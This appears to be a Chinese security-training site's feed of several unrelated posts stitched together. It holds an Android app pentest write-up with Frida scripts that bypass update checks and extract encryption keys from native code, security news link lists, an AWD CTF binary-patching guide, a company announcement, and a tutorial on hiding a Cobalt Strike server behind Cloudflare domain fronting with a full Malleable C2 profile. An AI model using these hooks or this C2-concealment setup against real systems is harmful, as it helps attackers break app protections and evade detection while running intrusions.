前言： 客户仅提供官网下载地址给我们测试。但是由于官网的版本不是最新的，APP会强制你升级。而升级后的APP，是进行加固后的，无法使用frida进行hook，注入进程。那同样也无法使用SSL Unpinning进行限制客户端校验证书。新版app使用查壳软件显示未加壳，但是查看源代码明显少了很多代码，且很多都是变量声明而已。 绕过更新： 我们要想能对APP渗透测试，一般都是需要抓包和解密的。首先使用burp进行抓包代理，官网版本的APP（以下统称旧版APP），是可以轻松抓到APP的包的（该条请求为检验APP最新版本的请求）。但是内容使用了加密，具体什么加密是不得而知。 获取到请求密文： vVAK0jos5eT9gmQJaHOaYbqZ1mgXoBH3bee3MTF3G5wNRHRoPPOYokZLT4MQqaPDN%2BLeEYpIzzDJeErDHcDfhY8muosLfOaw35W3BuCxDNtuNFB86RumMBtOcQXT08qw 响应包未json，urldecode后为： {"duration":"0ms","note":"","code":1,"resultDES":"UX/jHk6yqix2yxZIrf0rSIuOjCy6oGxjCPUfBL2avG+DWy/++NW16+YQHVFQ+Nj2w9VOWGcH4OxFtGxbR6K7I6pY0Q9hkP9gc0K0JLZ5O+PwOW72nzissCiLG+cHqadKHzkPOQDdBUuBoa4W1Jz7fQ=="} 通过desStr和resultDES，一开始我猜测他为des加密，具体是不是，后续再说。 先进入APP，但是一进入APP就提示更新： 通过前言，我们知道是不能更新的。（当然不乏某些技术大佬也可以把新版APP搞定，我技术有限，感觉旧版的比较容易搞）。那我们就明确了目标，要先绕过更新校验。 对于不了解hook**和frida的同学，我这边推荐先去网上了解下，还有安装之类的，再来看此篇文章。 首先我们明确一下思路，要怎么绕过这个更新校验呢？ （1）直接反编译，修改APP的版本信息为99.99之类的； （2）通过修改版本验证请求，使用http层面去绕过； （3）使用hook，去重写更新函数，或者绕过更新函数； 第一点要app能支持反编译且不存在校验签名。第二点要能知道加密密文的密钥。所以我选择第三种： 通过jadx搜索更新，发现了两处，成功获取到源代码。 类名分别为：com.xxxx.AppUpdate和com.xxxx.WelcomeActivity，通过代码审计可以看到，是先调用的WelcomeActivity，WelcomeActivity再去调用的AppUpdate： 跟踪进入AppUpdate，调用的checkNativeAppVersion()： 通过上述代码，我们可以看到，这边就是用于判断是否升级的函数。 public void onResponse(Call call, Response response) throws IOException {    try {        JSONObject jSONObject = new JSONObject(C.s2(new JSONObject(URLDecoder.decode(response.body().string(), DataUtil.UTF8)).getString("resultDES"), Config.WHITE_KEY, Config.IV.getBytes()));        if (jSONObject.optInt("code", -1) > 0) {            JSONObject optJSONObject = jSONObject.optJSONObject("object");            if (optJSONObject == null) {                return;           }            if (WakedResultReceiver.CONTEXT_KEY.equals(optJSONObject.optString("isUpdate", ChatConfig.CARD_TYPE))) {                nativeAppVersionInterface.updateApp(optJSONObject.optString("desc", "当前有新版本，是否需要更新"), optJSONObject.optString(ClientCookie.VERSION_ATTR, ""));           } else {                nativeAppVersionInterface.noUpdateApp();           }       } else {            nativeAppVersionInterface.showError(jSONObject.optString("note"));       }   } catch (JSONException e) {        e.printStackTrace();        nativeAppVersionInterface.showError(e.getMessage());   } } 当JSONObject.optInt("code", -1) > 0时，是会去进行升级的，否则则执行nativeAppVersionInterface.noUpdateApp()。 这边分析完后，其实我们就可以写js进行hook操作了。 我们的hook思路可以这样设置了： 重写checkNativeAppVersion函数，执行执行nativeAppVersionInterface.noUpdateApp()。 Ps：因为我一开始直接重写了checkNativeAppVersion，只执行了console.log(“enter checkNativeAppVersion”)，没有对APP进行启动，这样就会直接卡死在启动页。 附上js代码： if(Java.available){    console.log('success');        Java.perform(function(){        var appUpdate = Java.use("com.xxxx.AppUpdate");        appUpdate.checkNativeAppVersion.implementation = function(a,b,c,d,e,f){            console.log("enter AppUpdate");//判断是否进入该hook函数，进入会执行该命令            f.noUpdateApp();//直接执行不需要更新函数，APP会自动进入       }       }); } 使用命令：frida -U -l .\xxx.js -f 包名 --no-pause 成功进入： 解密： 已经成功进入该APP，但是如果想成功进行渗透测试的话，还需要能解开APP的加密。通过des字段，初步判断为des加密，再回头看看刚刚更新的那个请求，是有用c.s2()函数进行操作的，大概率s2就是解密函数。 JSONObject jSONObject = new JSONObject(C.s2(new JSONObject(URLDecoder.decode(response.body().string(), DataUtil.UTF8)).getString("resultDES"), Config.WHITE_KEY, Config.IV.getBytes())); 可以看到s2的三个参数，即前面响应包中的json字段里面的resultDES参数，然后其次是Config.WHITE_KEY, Config.IV两个参数，其中Config.IV是以字节数组的形式进行传参的。通过跳转可以看到配置文件的参数。 然后呢，因为获取到密钥和偏移量iv，这样的话des就可以解了。但是问题是解不开。后续的思路就是如果可以直接hook这两个加解密函数的话，是不是就可以不用管他的加解密了。 s1和s2函数不在java层，那我们就需要hook native层的代码。Hook so文件。首先我们先把安装包后缀apk改成zip，然后解压。就可以找到wkb-1.2.2.so的文件了。（路径为lib/arm64-v8a/wkb-1.2.2.so，前面的arm64根据自己测试机的CPU架构进行选择。）直接用ida打开，在导出函数里面搜索des： 里面有很多des的相关函数。可使用以下js进行hook导出函数： if(Java.available){    console.log('success');        Java.perform(function(){        var point = Module.findExportByName("libwkb-1.2.2.so","desDecryptByteArray");        Interceptor.attach(point,{            onEnter: function(args){                console.log("Hook start");                console.log("args[0]=" + args[0]); //打印我们java层第一个传入的参数                console.log("args[1]=" + args[1]); //打印我们java层传入的第二个参数           },            onLeave: function(retval){ //onLeave: function(retval)是该函数执行结束要执行的代码，其中retval参数即是返回值                console.log("return:" + retval); //打印返回值           }       });       }); } 但是这边很奇怪的是，通过函数findExportByName找到的地址都是为null，一开始以为是还没加载到so文件，但是后续进入APP后还是一样为null。（有知道的大佬可以说下） 这就比较蛋疼了，得手动计算地址。首先先获取so文件的地址，看能不能获取到，若不行，则表示未加载so文件。 var soAddr = Module.findBaseAddress("libwkb-1.2.2.so"); console.log("soAddr:" + soAddr); 有地址出来，说明so文件是存在的，可以正常调用。那么这边就要去计算函数偏移量。之前在网上看到别人的一个公式： 函数地址=so**初始地址+函数偏移量+1** 但是我后面尝试了好几个，好像不同手机不同的计算方法，也可能我操作的有问题。我这边的函数地址就是： 函数地址=so**初始地址+函数偏移量** 不用加一。我自己是用这个方法测试计算的：找到一个导出函数可以被查询到的，比如我这边使用的就是JNI_OnLoad函数： 获取JNI_OnLoad的地址为0x79d5d7883c，然后使用这个地址减去so的地址： 0x79d5d7883c − 0x79d5d67000 = 1183c 差值刚好为JNI_OnLoad的偏移量，所以我这边就不用再进行加一操作了。 这样我们就可以成功hook任意函数了。通过我一个个尝试发现，以下函数一个都没调用过： 然后呢，我查找了s2函数的用例，发现被decodeSm4的函数调用过。 我就尝试了一下，hook了sm4EncryptByteArr： 附上js： var soAddr = Module.findBaseAddress("libwkb-1.2.2.so"); var point = soAddr.add(0x136f0); Interceptor.attach(point,{            onEnter: function(args){                console.log("Hook start");                console.log("args[0]=" + args[0]); //打印我们java层第一个传入的参数                console.log("args[2]=" + Java.vm.getEnv().getStringUtfChars(args[2], null).readCString()); //打印我们java层传入的第三个参数                console.log("args[3]=" + Java.vm.getEnv().getStringUtfChars(args[3], null).readCString()); //打印我们java层传入的第四个参数           },            onLeave: function(retval){ //onLeave: function(retval)是该函数执行结束要执行的代码，其中retval参数即是返回值                console.log("return:" + Java.vm.getEnv().getStringUtfChars(retval, null).readCString()); //打印返回值                // retval.replace(0); //替换返回值为0                // return retval;           }       }); Ps：通过ida里面的参数，我们可以看到第二个参数为类，我们就没给他打印出来。 我人傻了，一开始的des字眼和偏移量这些都符合des的加密方式，误导了我好久，一直往des方向去找。 尾声： 其实很早我就已经解密成功了，直接通过java层，刚刚发现调用s2的decodeSm4函数，直接hook那边即可成功获取请求和响应的明文： 但是若通过js去操作修改数值，实在太麻烦了，要获取密钥和加密方式，通过脚本自动去加解密，所以我才会去hook native层，获取到密钥。因为上述密钥Config.WHITE_KEY，其实是还有一层加密的，通过hook decodeWhiteKey函数的返回值，成功获取了密钥。 其实后续我也尝试去修改版本号绕过，但是事实证明，代码存在验签： 可以看到，把版本号修改为99.9.99，成功绕过了更新检测，但是他还存在一个盗版验签检测： 验签代码一样需要用hook去绕过。所以前面说的方法一也是行不通的。然后我又突发奇想，有没有可能他密文里面就包含版本信息，那如果我使用99.9.99的版本，抓取密文，然后再安装旧版APP，在他去请求版本更新时，替换密文，是不是可以绕过呢？经过尝试，结果是：可以。他的版本校验就是在服务端，这种方法也可以绕过。 总结： 不用轻易相信别人留下的信息，还是得根据自己的分析得出结论。其实后续我一直在想为什么那个字段是des呢，感觉之前是des加密，后续金融行业都进行了国密改造，然后字段并未更改，导致这种现象，当然只是猜测。至此，已完成对这APP的抓包和加解密。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、一名参与LockBit勒索攻击的嫌疑人在加拿大被捕 https://www.bleepingcomputer.com/news/security/russian-lockbit-ransomware-operator-arrested-in-canada/ 2、美国卫生部警告Venus勒索组织针对美国医疗组织发起攻击 https://www.bleepingcomputer.com/news/security/us-health-dept-warns-of-venus-ransomware-targeting-healthcare-orgs/ 3、研究人员发现Conti将其业务转移至BlackByte和Black Basta中 https://cyware.com/news/conti-affiliates-blackbyte-and-black-basta-rotating-targets-681fc6b8 4、研究人员发现针对印度国防人员的Spymax RAT新变种 https://www.cyfirma.com/outofband/unknown-nation-based-threat-actor-using-android-rat-to-target-indian-defence-personnel-2/ 5、思科修复企业防火墙产品中的33个漏洞 https://www.securityweek.com/cisco-patches-33-vulnerabilities-enterprise-firewall-products 6、GitHub 为公共存储库引入私有漏洞报告功能 https://www.securityweek.com/github-introduces-private-vulnerability-reporting-public-repositories 7、Foxit 修复了 PDF Reader 中的多个代码执行漏洞 https://www.securityweek.com/foxit-patches-several-code-execution-vulnerabilities-pdf-reader 8、Lockbit团伙泄露了从科技巨头Thales 窃取的数据 https://securityaffairs.co/wordpress/138471/data-breach/lockbit-leaked-thales-files.html 9、加拿大第二大连锁超市 Sobeys 遭遇勒索软件攻击 https://securityaffairs.co/wordpress/138424/cyber-crime/sobeys-ransomware-attack.html 10、LiteSpeed存在漏洞，可导致Web服务器被完全接管 https://www.securityweek.com/litespeed-vulnerabilities-can-lead-complete-web-server-takeover

AWD简介 AWD(Attack With Defense，攻防兼备) 模式需要在一场比赛里要扮演攻击方和防守方，利用漏洞攻击其他队伍进行得分，修复漏洞可以避免被其他队伍攻击而失分。也就是说，攻击别人的靶机可以获取 Flag 分数时，别人会被扣分，同时也要保护自己的主机不被别人攻陷而扣分。 Patch-PWN 各家 awd 平台检查机制各不相同，原则上是只针对漏洞点进行 patch 加固，也就是最小修改加固。以下总结不需要改动文件大小、针对漏洞点进行 patch 的几种漏洞类型。 Patch资料 跳转指令 无符号跳转 汇编指令描述JA无符号大于则跳转JNA无符号不大于则跳转JAE无符号大于等于则跳转（同JNB）JNAE无符号不大于等于则跳转（同JB）JB无符号小于则跳转JNB无符号不小于则跳转JBE无符号小于等于则跳转（同JNA）JBNE无符号不小于等于则跳转（同JA） 有符号跳转 汇编指令描述JG有符号大于则跳转JNG有符号不大于则跳转JGE有符号大于等于则跳转（同JNL）JNGE有符号不大于等于则跳转（同JL）JL有符号小于则跳转JNL有符号不小于则跳转JLE有符号小于等于则跳转（同JNG）JNLE有符号不小于等于则跳转（同JG） Patch-整数溢出 Scanf 以 long int 长整形读取输入到 unsigned int 变量 v2 中，然后将 v2 强制转为 int 再与int 48 比较。 但从 scanf 读入一个负数时，最高位为 1 ，从 unsigned int 强制转换为 int 结果是负数，必定比 48 小，在后面 read 读入会造成栈溢出。 Patch方法 将第 9 行的 if 跳转汇编指令 patch 为无符号的跳转指令。 使用 keypatach 进行修改： jle --> jbe Patch-栈溢出 对于栈溢出加固，x64 更容易一些，因为是使用寄存器传参，而x86 使用栈传参，需要用 nop 等保持加固前后的空间不变。 x64 Patch方法 100 是第三个参数，存储寄存器是 rdx ，找到给 rdx 传参的汇编指令进行 patch 使用 ida 默认修改插件修改（Edit-Patch Program-Change word），也可以用 keypatach ： 0x64 是长度 0xBA 是操作符 0x64 --> 0x20 x86 不需要对齐 找到压栈的指令，修改压入的数值 修改数值需要补上 0x 这里修改前 size 为 2 ，修改后 size 也为 2 ，所以这题 patch 不需要用 nop 保持 size 需要对齐 找到压栈的指令，修改压入的数值 直接修改 0x20 后，size 长度不对齐，会引起栈空间变化，需要用 nop 进行对齐： 更方便快捷方法是勾选 NOPs padding until next instruction boundary 进行自动填充。 Patch-格式化字符串 修改函数 将 printf 改为 puts ，将 call 的地址改为 puts plt 地址： 这个方法局限性在于：puts 会在原字符串多加 \n ，主办方 check 可能会因此而不通过 修改printf参数 将 printf(format) 修改为 printf("%s",format) 修改 printf 前面的传参指令： mov edi, offset 0x400c01;mov esi,offset format; Patch-UAF 修改逻辑是劫持 call 指令跳转到 .eh_frame 段上写入的自定义汇编程序。 先在 .eh_frame 段上写入代码，首先是 call free 完成释放，然后对 chunk_list 进行置零。取 chunk_list 地址的汇编可以从 call free 前面抄过来： call 0x900;           #调用free函数（plt地址）mov     eax, [rbp-0xc]; #取出下标值cdqe;lea     rdx, ds:0[rax*8];lea rax, qword ptr [heap];mov r8,0; #段地址不能直接赋予立即数mov [rdx+rax],r8;jmp 0xD56; #跳回原来的地址 Patch-if范围 假设需要将图上第二个 if 放到 if 结构内，修改跳转的地址即可： 原始跳转代码： js 0x40081C --> js 0x400845 Patch-更换危险函数 类似与 uaf 一样写汇编实现功能调用，将危险函数替换为其他函数，如果程序中没有目标函数，就通过系统调用方式调用。 将 gets 替换为 read 输入 .eh_frame 写入汇编，将 rdi 的写入地址移动到 rsi ，把其他寄存器也传参之后进行系统调用：

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、ABB 石油和天然气流量和控制器受到严重漏洞的影响 https://www.securityweek.com/abb-oil-and-gas-flow-computer-hack-can-prevent-utilities-billing-customers 2、LockBit 以 5000 万美元的价格出售从Continental 窃取的文件 https://www.securityweek.com/ransomware-gang-offers-sell-files-stolen-continental-50-million 3、Apple 更新修补了 iOS、macOS 中的远程代码执行漏洞 https://www.securityweek.com/apple-patches-remote-code-execution-flaws-ios-macos 4、联想修复了两个影响各种笔记本电脑型号的严重漏洞 https://securityaffairs.co/wordpress/138312/security/lenovo-bypass-security-features.html 5、研究人员发现了隐藏在图像文件中的恶意代码 PyPI 包-apicolor https://thehackernews.com/2022/11/researchers-uncover-pypi-package-hiding.html 6、攻击者入侵 15,000 个网站进行大规模谷歌 SEO 中毒活动 https://blog.sucuri.net/2022/11/massive-ois-is-black-hat-redirect-malware-campaign.html 7、美国CISA成立化工行业网络安全工作组 https://www.secrss.com/articles/48789 8、欧盟政府被指控使用间谍软件掩盖腐败和犯罪活动 https://therecord.media/eu-governments-accused-of-using-spyware-to-cover-up-corruption-and-criminal-activity/ 9、研究人员警告针对印度顶级银行客户的大规模钓鱼活动 https://thehackernews.com/2022/11/warning-this-widespread-malicious.html 10、LockBit 附属组织使用 Amadey Bot部署勒索软件 https://www.bleepingcomputer.com/news/security/lockbit-affiliate-uses-amadey-bot-malware-to-deploy-ransomware/

日前，全国高新技术企业认定管理工作领导小组办公室发布了湖南省认定机构2022年认定的第一批高新技术企业进行备案的公告，湖南蚁景科技有限公司位列名单中，成功跻身国家高新技术企业。 图一：截图来自湖南省科学技术厅 图二：截图来自湖南省科学技术厅 湖南蚁景科技自成立以来，深耕网络安全教育平台技术研究及网络安全培训产品研发， 不断完善网络安全人才培养机制，丰富人才培养解决方案。为本次成功跃迁为国家高新技术企业奠定了良好基础。 目前主要有蚁景网安实验室、教师专属实验室和蚁景网安学院三大产品与服务。 蚁景网安实验室 “互联网+教育”的深刻理解，通过自主研发的“网络安全人才实训靶场”，为高校、政企单位、科研院所等行业客户提供满足在线实验教学的虚拟实验环境与各种课件资源。 教师专属实验室 具备完善的人才培养体系，按需制定教学计划，线上安全技术导师。 集日常上课、课后作业、课程考试和教学评估于一体，增强学员间、师生间的互动性和共享性，为高校打造一个积极向上的网安学习圈子。 蚁景网安学院 蚁景网安学院，现已开设包括Web安全、渗透测试、CTF系列、Python全栈安全开发等多个网安方向的课程。定位目前市场岗位需求，打通网安人才培养最后一公里。 本次被认定为国家高新技术企业，是湖南蚁景科技有限公司深耕网络安全人才培养的成果，也是国家对公司在网安人才培养大力支持和认可。蚁景科技将继续加大网安投入，培养更多更优秀的网安领域高精尖的实践型人才。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、VMware修复了Workspace ONE Assist中的三个身份验证漏洞 https://www.bleepingcomputer.com/news/security/vmware-fixes-three-critical-auth-bypass-bugs-in-remote-access-tool/ 2、微软修复了ProxyNotShell零日漏洞 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-proxynotshell-exchange-zero-days-exploited-in-attacks/ 2、谷歌披露监控供应商利用三星手机的零日漏洞 https://securityaffairs.co/wordpress/138302/hacking/surveillance-vendor-exploited-samsung-phone-zero-days.html 3、攻击者利用 IPFS 去中心化网络托管恶意软件 https://www.securityweek.com/attackers-using-ipfs-distributed-bulletproof-malware-hosting 4、研究人员发现一个名为Cloud9的新Chrome浏览器僵尸网络 https://www.bleepingcomputer.com/news/security/malicious-extension-lets-attackers-control-google-chrome-remotely/ 5、英国情报公司雇用大批印度黑客进行非法“调查” https://www.secrss.com/articles/48738 6、《信息安全技术 关键信息基础设施安全保护要求》发布 https://www.freebuf.com/news/349108.html 7、新的 IceXLoader 恶意软件变种感染了全球数千名受害者 https://thehackernews.com/2022/11/new-icexloader-malware-loader-variant.html 8、英特尔和 AMD周二补日解决了数十个漏洞 https://www.securityweek.com/intel-amd-address-many-vulnerabilities-patch-tuesday-advisories 9、Microsoft 修补了 MotW 零日漏洞 https://www.securityweek.com/microsoft-patches-motw-zero-day-exploited-malware-delivery 10、黑客开始泄露从Medibank 窃取的敏感医疗记录 https://www.securityweek.com/hackers-leak-australian-health-records-dark-web

域前置介绍 域前置又译为域名幌子，是一种隐藏连接真实端点来规避审查的技术。在应用层上运作时，域前置使用户能通过HTTPS连接到被屏蔽的服务，而表面上像在与另一个完全不同的站点通信。 域前置工作原理 域前置核心就是CDN，可以通过添加 A 记录或 AAAA 记录解析的方式将网站域名指向网站服务器公网 IP 地址，来实现用户可以通过域名直接访问已部署在服务器上的网站，而无需使用难记且无明显标识的 IP 地址访问。CDN能够对域名进行加速，当对某个域名进行访问时，并不会直接解析到IP，因此可以给攻击VPS申请一个CDN加速服务，从而达到隐藏IP的效果 CDN工作原理 CDN又叫内容分发网络（Content Delivery Network） 当用户访问域名时，先请求LDNS(即本地dns)，如果有缓存会返回给用户ip地址，如果LNDS无缓存即向授权DNS请求，授权DNS解析域名返回别名域名，域名解析请求发送至公有云DNS调度系统，则会分配最佳节点ip地址，LDNS会缓存该IP地址，用户根据该ip地址请求资源，节点ip隐藏了真实ip的地址。 搭建过程 这里选择腾讯云的域名 先实名后注册，注册时间可能比较久，在腾讯云服务器上，根据申请的域名添加解析记录。 域名备案，实际上国内的备案了之后Redteam已无法使用了。 注册 cloudflare https://www.cloudflare.com/zh-cn/进入后添加站点 输入申请的域名别名，选择免费即可 继续 这里会对域名的A记录和CNAME自动进行检测 这个时候邮箱会收到cloudflare的邮件。 修改dns记录，域名注册->我的域名->概览位置修改dns 然后等待dns刷新即可，此时我们ping一下我们的域名发现，解析后的ip地址不是真实的ip地址。 ip地址为cloudflare的ip nslookup查询 SSL/TLS 如果要实现https加密需要下载配置c2证书 下载证书 在VPS需重新生成cs的配置文件cobalstrike.store C2配置隐藏 项目地址 https://github.com/rsmudge/Malleable-C2-Profilesset sleeptime "5000"; set jitter   "0"; set maxdns   "255"; set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; http-get {   set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";       client {           header "Accept" "*/*";       header "Host" "www.xxx.xxx";   #配置自己的根域名不是别名           metadata {           base64;           prepend "session-token=";           prepend "skin=noskin;";           append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996";           header "Cookie";       }   }       server {           header "Server" "Server";       header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";       header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";       header "X-Frame-Options" "SAMEORIGIN";       header "Content-Encoding" "gzip";           output {           print;       }   } } http-post {       set uri "/N4215/adj/amzn.us.sr.aps";       client {           header "Accept" "*/*";       header "Content-Type" "text/xml";       header "X-Requested-With" "XMLHttpRequest";       header "Host" "www.xxx.xxx";   #配置自己的根域名不是别名           parameter "sz" "160x600";       parameter "oe" "oe=ISO-8859-1;";           id {           parameter "sn";       }           parameter "s" "3717";       parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com";           output {           base64;           print;       }   }       server {           header "Server" "Server";       header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT";       header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";       header "X-Frame-Options" "SAMEORIGIN";       header "x-ua-compatible" "IE=edge";           output {           print;       }   } } 启动服务端，调用配置文件 ./teamserver cs服务端ip password config.profile 生成监听 保存 生成64位的应用程序 成功上线 TIPS 实名注册的腾讯云域名的话是有备案的，所以这里的话建议选择国外的服务器注册域名。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、谷歌修补Android中的高危提权漏洞 https://www.securityweek.com/google-patches-high-severity-privilege-escalation-vulnerabilities-android 2、勒索软件团伙威胁要发布 Medibank 客户信息 https://www.securityweek.com/ransomware-gang-threatens-publish-medibank-customer-information 3、美国查获了10年前黑客从丝绸之路窃取的 34 亿美元比特币 https://www.securityweek.com/us-seizes-34-billion-bitcoin-stolen-silk-road 4、西门子和施耐德电气修复了多个严重漏洞 https://www.securityweek.com/ics-patch-tuesday-siemens-addresses-critical-vulnerabilities 5、加拿大肉类巨头 Maple Leaf Foods遭网络攻击导致业务中断 https://www.securityweek.com/cyberattack-causes-disruptions-canadian-meat-giant-maple-leaf-foods 6、Citrix ADC 和Gateway 受到高危身份验证绕过漏洞的影响 https://securityaffairs.co/wordpress/138264/security/citrix-gateway-adc-flaws.html 7、SmokeLoader 活动分发新的 Laplas Clipper 恶意软件 https://securityaffairs.co/wordpress/138251/malware/smokeloader-delivers-laplas-clipper.html 8、Amadey恶意软件在被黑机器上部署 LockBit 3.0 勒索软件 https://thehackernews.com/2022/11/amadey-bot-spotted-deploying-lockbit-30.html 9、诺基亚修复移动基带套件中的漏洞 https://www.itnews.com.au/news/nokia-moves-to-patch-vulnerable-mobile-baseband-kit-587514 10、安全厂商发布RanHassan勒索软件免费解密工具 https://www.bitdefender.com/blog/labs/ranhassan-ransomware-decryptor-now-available/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、澳大利亚健康保险公司Medibank 确认数据泄露影响了 970 万客户 https://www.securityweek.com/medibank-confirms-data-breach-impacts-97-million-customers 2、2023年微软将继续向乌克兰提供免费云服务，高达1亿美元 https://www.theregister.com/2022/11/04/microsoft_ukraine_tech_support/ 3、日本宣布正式加入北约网络防御中心 https://www.secrss.com/articles/48669 4、研究人员发现针对印度政府雇员的新恶意软件活动 https://thehackernews.com/2022/11/researchers-detail-new-malware-campaign.html 5、波音子公司遭网络攻击，致使全球多家航司航班规划中断 https://www.secrss.com/articles/48677 6、记者卧底调查：“网课爆破”污秽不堪，涉嫌违法犯罪 https://news.ycwb.com/2022-11/05/content_41149409.htm 7、湖南一公务员非法获取公民个人信息4亿余条：非法获利170余万 https://www.secrss.com/articles/48689 8、Check Point发布Q3全球网络攻击报告，医疗保健行业最易受勒索攻击 http://www.anquan419.com/news/21/1677.html 9、"Justice Blade" 黑客组织针对沙特阿拉伯 https://securityaffairs.co/wordpress/138213/hacking/justice-blade-targets-saudi-arabia.html 10、网络钓鱼活动滥用Microsoft Dynamics 365 客户语音窃取用户凭证 https://securityaffairs.co/wordpress/138147/cyber-crime/microsoft-dynamics-365-customer-voice-phishing.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、LockBit 3.0 团伙声称从 Kearney & Company 窃取了数据 https://securityaffairs.co/wordpress/138136/cyber-crime/lockbit-ransomware-kearney-company.html 2、微软称零日漏洞在越来越短的时间内被大规模利用 https://securityaffairs.co/wordpress/138100/security/treat-actors-zero-day.html 3、智利ALMA天文台因网络攻击而关闭运营 https://www.bleepingcomputer.com/news/security/alma-observatory-shuts-down-operations-due-to-a-cyberattack/ 4、AstraZeneca暴露了对其患者数据信息的访问权限 https://techcrunch.com/2022/11/03/astrazeneca-passwords-exposed-patient-data/ 5、网络攻击导致丹麦国家铁路列车停止运行 https://www.securityweek.com/cyberattack-causes-trains-stop-denmark 6、Robin Banks网络钓鱼活动重新上线 https://www.bleepingcomputer.com/news/security/robin-banks-phishing-service-returns-to-steal-banking-accounts/ 7、英国政府机构正在扫描该国托管的所有互联网设备 https://www.bleepingcomputer.com/news/security/british-govt-is-scanning-all-internet-devices-hosted-in-uk/ 8、研究人员发现多封针对推特认证用户的钓鱼邮件 https://www.bleepingcomputer.com/news/security/as-twitter-brings-on-8-fee-phishing-emails-target-verified-accounts 9、中央网信办印发《关于切实加强网络暴力治理的通知》 https://www.freebuf.com/news/348958.html 10、因对Twitter安全和内容审核不满，马斯克裁撤Twitter整个安全部门 https://www.freebuf.com/news/348957.html